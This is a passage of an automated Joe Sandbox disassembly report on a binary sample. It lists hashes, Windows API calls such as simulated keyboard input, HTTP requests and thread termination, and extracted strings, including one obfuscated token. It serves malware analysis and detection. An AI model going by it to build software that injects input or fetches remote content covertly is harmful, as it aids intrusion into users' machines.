                                                                                                                            • API String ID: 839392675-0
                                                                                                                            • Opcode ID: 5b8e187c6d8b451168b08a68e8ccd8a05bfc7de24e3534fe67ecb9501031700e
                                                                                                                            • Instruction ID: eb9597df9fc6c6838d45d2f588923c4065ed644076cd60ce17f26ba41f8b0d33
                                                                                                                            • Opcode Fuzzy Hash: 5b8e187c6d8b451168b08a68e8ccd8a05bfc7de24e3534fe67ecb9501031700e
                                                                                                                            • Instruction Fuzzy Hash: 3FF03032641658BBE7215BA2DC0DFEF7B7CEFC6B11F00016EFA14D1061D7A51A0286B5
                                                                                                                            APIs
                                                                                                                            • InterlockedExchange.KERNEL32(?,?), ref: 00C77243
                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77254
                                                                                                                            • TerminateThread.KERNEL32(00000000,000001F6,?,00C20EE4,?,?), ref: 00C77261
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C20EE4,?,?), ref: 00C7726E
                                                                                                                              • Part of subcall function 00C76C35: CloseHandle.KERNEL32(00000000,?,00C7727B,?,00C20EE4,?,?), ref: 00C76C3F
                                                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C77281
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00C20EE4,?,?), ref: 00C77288
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3495660284-0
                                                                                                                            • Opcode ID: 7ab1756b1b52eea2269aecd997291079406a0dc3a16f2606f8cc46b53d750e62
                                                                                                                            • Instruction ID: 8cfeca2c437da8f56193c6459f251342d62f3ca52d0043d6ff63bc409005a1ad
                                                                                                                            • Opcode Fuzzy Hash: 7ab1756b1b52eea2269aecd997291079406a0dc3a16f2606f8cc46b53d750e62
                                                                                                                            • Instruction Fuzzy Hash: 9AF05E36540A12EBD7121B64ED4CBDE7729FF45702B10063BF603D10A1CB766912CB50
                                                                                                                            APIs
                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C6899D
                                                                                                                            • UnloadUserProfile.USERENV(?,?), ref: 00C689A9
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C689B2
                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C689BA
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C689C3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C689CA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 146765662-0
                                                                                                                            • Opcode ID: 1e95c315ee17b5e7dbd14053c5972e87d6e313eaf45be1d1be4b60e74b6592be
                                                                                                                            • Instruction ID: c2ae64abe0ab52dfd0149d9321a0959099f70773d5231b3415b0c11393dad4a1
                                                                                                                            • Opcode Fuzzy Hash: 1e95c315ee17b5e7dbd14053c5972e87d6e313eaf45be1d1be4b60e74b6592be
                                                                                                                            • Instruction Fuzzy Hash: 01E05276104505FBDA021FF5EC0CB5EBB69FB89762B60863AF219C1470CB369462DB90
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00C88613
                                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00C88722
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00C8889A
                                                                                                                              • Part of subcall function 00C77562: VariantInit.OLEAUT32(00000000), ref: 00C775A2
                                                                                                                              • Part of subcall function 00C77562: VariantCopy.OLEAUT32(00000000,?), ref: 00C775AB
                                                                                                                              • Part of subcall function 00C77562: VariantClear.OLEAUT32(00000000), ref: 00C775B7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                            • API String ID: 4237274167-1221869570
                                                                                                                            • Opcode ID: 31bdf6dd097a6017a77e5ddae26decd7d7c2180973d67dec0e3b257b8d5f4c34
                                                                                                                            • Instruction ID: 8ecf91ae908ef6caee9fce32247410df4f05db45ff1b59ecc3127ee0c1420585
                                                                                                                            • Opcode Fuzzy Hash: 31bdf6dd097a6017a77e5ddae26decd7d7c2180973d67dec0e3b257b8d5f4c34
                                                                                                                            • Instruction Fuzzy Hash: 0F918E75604301DFCB10EF24C48495AB7F4EF89718F54892EF89A8B3A1DB31E94ADB52
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C2FC86: _wcscpy.LIBCMT ref: 00C2FCA9
                                                                                                                            • _memset.LIBCMT ref: 00C72B87
                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72BB6
                                                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C72C69
                                                                                                                            • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C72C97
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 4152858687-4108050209
                                                                                                                            • Opcode ID: 7a2b2ff69c0d672a4e6c313a12bcd331ee6fe5103afa0c9d4c3e3e8a9c46fc56
                                                                                                                            • Instruction ID: 55d391421028701d3cb6df4f64a918b47cdc09777377595725d208e275443515
                                                                                                                            • Opcode Fuzzy Hash: 7a2b2ff69c0d672a4e6c313a12bcd331ee6fe5103afa0c9d4c3e3e8a9c46fc56
                                                                                                                            • Instruction Fuzzy Hash: C951C0716083019FE7269E28C845A6FB7E8EF65350F148A2DF8A9D3291DB70CE44E752
                                                                                                                            APIs
                                                                                                                            • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C6D5D4
                                                                                                                            • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C6D60A
                                                                                                                            • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C6D61B
                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C6D69D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                            • String ID: DllGetClassObject
                                                                                                                            • API String ID: 753597075-1075368562
                                                                                                                            • Opcode ID: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
                                                                                                                            • Instruction ID: e3df6da83d9ff2d7a7f1bbd328ae341710044ec8350ad306ef528632bbb14f6f
                                                                                                                            • Opcode Fuzzy Hash: 245593c9612ffcee14a12ea4dc5162536ba9e6061e1aa34a0f5da2f4b6faaca6
                                                                                                                            • Instruction Fuzzy Hash: 68417DB1A00205EFDB25CF54C8C8B9A7BA9EF44314F1585ADF90A9F205D7B1DA40CBA0
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00C727C0
                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C727DC
                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C72822
                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CD5890,00000000), ref: 00C7286B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Delete$InfoItem_memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 1173514356-4108050209
                                                                                                                            • Opcode ID: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
                                                                                                                            • Instruction ID: e576adbed5139c5e706b166f7d84e177493b3482da9f4b481c64246e56921a76
                                                                                                                            • Opcode Fuzzy Hash: b4886ae3501a577992a5e6173739bcd49a52a64aefb30cf3e387906e15ae284e
                                                                                                                            • Instruction Fuzzy Hash: CB41AE722043419FD720DF25C884F5ABBE8EF85314F148A2EF8A9972D2D731A905DB63
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00C70B27
                                                                                                                            • SetKeyboardState.USER32(00000080,?,00000001), ref: 00C70B43
                                                                                                                            • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00C70BA9
                                                                                                                            • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00C70BFB
                                                                                                                            Strings
                                                                                                                            • w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C70B5D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                            • String ID: w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
                                                                                                                            • API String ID: 432972143-4167011992
                                                                                                                            • Opcode ID: 5358b3009b71603e5b8b9b8f2b69210876832f0780f0815f6e8cd7415f594ee4
                                                                                                                            • Instruction ID: c8e90a54c1edde30a9a8a22de034e1e8c65c3c5525f0de3d0be6b8239b9bef3e
                                                                                                                            • Opcode Fuzzy Hash: 5358b3009b71603e5b8b9b8f2b69210876832f0780f0815f6e8cd7415f594ee4
                                                                                                                            • Instruction Fuzzy Hash: 5C315A70D40608EFFF308B65CC09BFEBBA6AB45318F28C25AF4A8921D1C3748B519751
                                                                                                                            APIs
                                                                                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C70C66
                                                                                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C70C82
                                                                                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C70CE1
                                                                                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C70D33
                                                                                                                            Strings
                                                                                                                            • w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0, xrefs: 00C70C9F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: KeyboardState$InputMessagePostSend
                                                                                                                            • String ID: w02d0we2d0wb2d0w72d0w02d0w82d0wd2d0w42d0w52d0wd2d0w82d0w52d0w02d0w82d0wd2d0w82d0wd2d0w32d0w02d0wf2d0we2d0wf2d0wf2d0wf2d0wf2d0w52d0
                                                                                                                            • API String ID: 432972143-4167011992
                                                                                                                            • Opcode ID: c0a0f312a690ecf9a8225a016f35da37617fd5105a2d460325785fab9e07e148
                                                                                                                            • Instruction ID: 6ea1c11c645f8b178377c4cba8f4ac76371fce61b4900f784f56251565be680c
                                                                                                                            • Opcode Fuzzy Hash: c0a0f312a690ecf9a8225a016f35da37617fd5105a2d460325785fab9e07e148
                                                                                                                            • Instruction Fuzzy Hash: F7312630940318EEFF318B6988097FEBBAAAB45310F24C35FE4A9921D1C3759A55D762
                                                                                                                            APIs
                                                                                                                            • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C8D7C5
                                                                                                                              • Part of subcall function 00C1784B: _memmove.LIBCMT ref: 00C17899
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BuffCharLower_memmove
                                                                                                                            • String ID: cdecl$none$stdcall$winapi
                                                                                                                            • API String ID: 3425801089-567219261
                                                                                                                            • Opcode ID: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
                                                                                                                            • Instruction ID: ae17c69f4bd93bddf0b601a9278aa2219ea9e96686ff9c30ae3fbe0ac3efc6d9
                                                                                                                            • Opcode Fuzzy Hash: c6ed0eed1dc814a484a183d765a918a96083acf9788688969f73f16cc28458cd
                                                                                                                            • Instruction Fuzzy Hash: AF319E71904619ABCF00EF54C8559EEB3B4FF05324F108669F836A76D1DB31AE05DB80
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                                                                              • Part of subcall function 00C6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C6AABC
                                                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C68F14
                                                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C68F27
                                                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C68F57
                                                                                                                              • Part of subcall function 00C17BCC: _memmove.LIBCMT ref: 00C17C06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$_memmove$ClassName
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 365058703-1403004172
                                                                                                                            • Opcode ID: 246f0b6fce253749ff58aad1d8b738dfd1383e1aa878fa30ec6f194dc5bc1d14
                                                                                                                            • Instruction ID: 141653f875dc701d0cec3c2c55aaccf1edb2fc41de34cbb6c2bb22f1d4ab7b16
                                                                                                                            • Opcode Fuzzy Hash: 246f0b6fce253749ff58aad1d8b738dfd1383e1aa878fa30ec6f194dc5bc1d14
                                                                                                                            • Instruction Fuzzy Hash: 4021E471A04108BEDB24ABB0DC89DFFB779DF46320F14462AF421A71E1DF35494AAA50
                                                                                                                            APIs
                                                                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C8184C
                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C81872
                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C818A2
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00C818E9
                                                                                                                              • Part of subcall function 00C82483: GetLastError.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C82498
                                                                                                                              • Part of subcall function 00C82483: SetEvent.KERNEL32(?,?,00C81817,00000000,00000000,00000001), ref: 00C824AD
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3113390036-3916222277
                                                                                                                            • Opcode ID: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
                                                                                                                            • Instruction ID: 748d8bc9666c824815bab96fa9b8f4b1da43192cc14803bf6ee433c22effcc26
                                                                                                                            • Opcode Fuzzy Hash: 9773757eb200906c178730e271be92a35d0cb03a3e6e3b9e405a42c85be4ee85
                                                                                                                            • Instruction Fuzzy Hash: 3E21B0B1510208BFEB11AB61CC8AFBF77EDEB48749F14412AF805D7180DB208E0667B4
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00C11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C11D73
                                                                                                                              • Part of subcall function 00C11D35: GetStockObject.GDI32(00000011), ref: 00C11D87
                                                                                                                              • Part of subcall function 00C11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C11D91
                                                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C96461
                                                                                                                            • LoadLibraryW.KERNEL32(?), ref: 00C96468
                                                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C9647D
                                                                                                                            • DestroyWindow.USER32(?), ref: 00C96485
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063111586.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_c10000_NWPZbNcRxL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                            • String ID: SysAnimate32
                                                                                                                            • API String ID: 4146253029-1011021900
                                                                                                                            • Opcode ID: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
                                                                                                                            • Instruction ID: 65daf98cc523315c56ca148d0b75c97c527f7747b0e9370b9549bc884331e71e
                                                                                                                            • Opcode Fuzzy Hash: 8d1ddd41133344ffccb1b468bda381952ba8d5f7e73b4ee5d508719129b1e3e4
                                                                                                                            • Instruction Fuzzy Hash: C7216D71210205BFEF108FA4DC98FBB77ADEB59764F104629FA60921E0D771DC51A760
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C76DBC
                                                                                                                            • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C76DEF
                                                                                                                            • GetStdHandle.KERNEL32(0000000C), ref: 00C76E01
                                                                                                                            • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C76E3B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2062918021.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2062900306.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2062973190.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2063071767.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
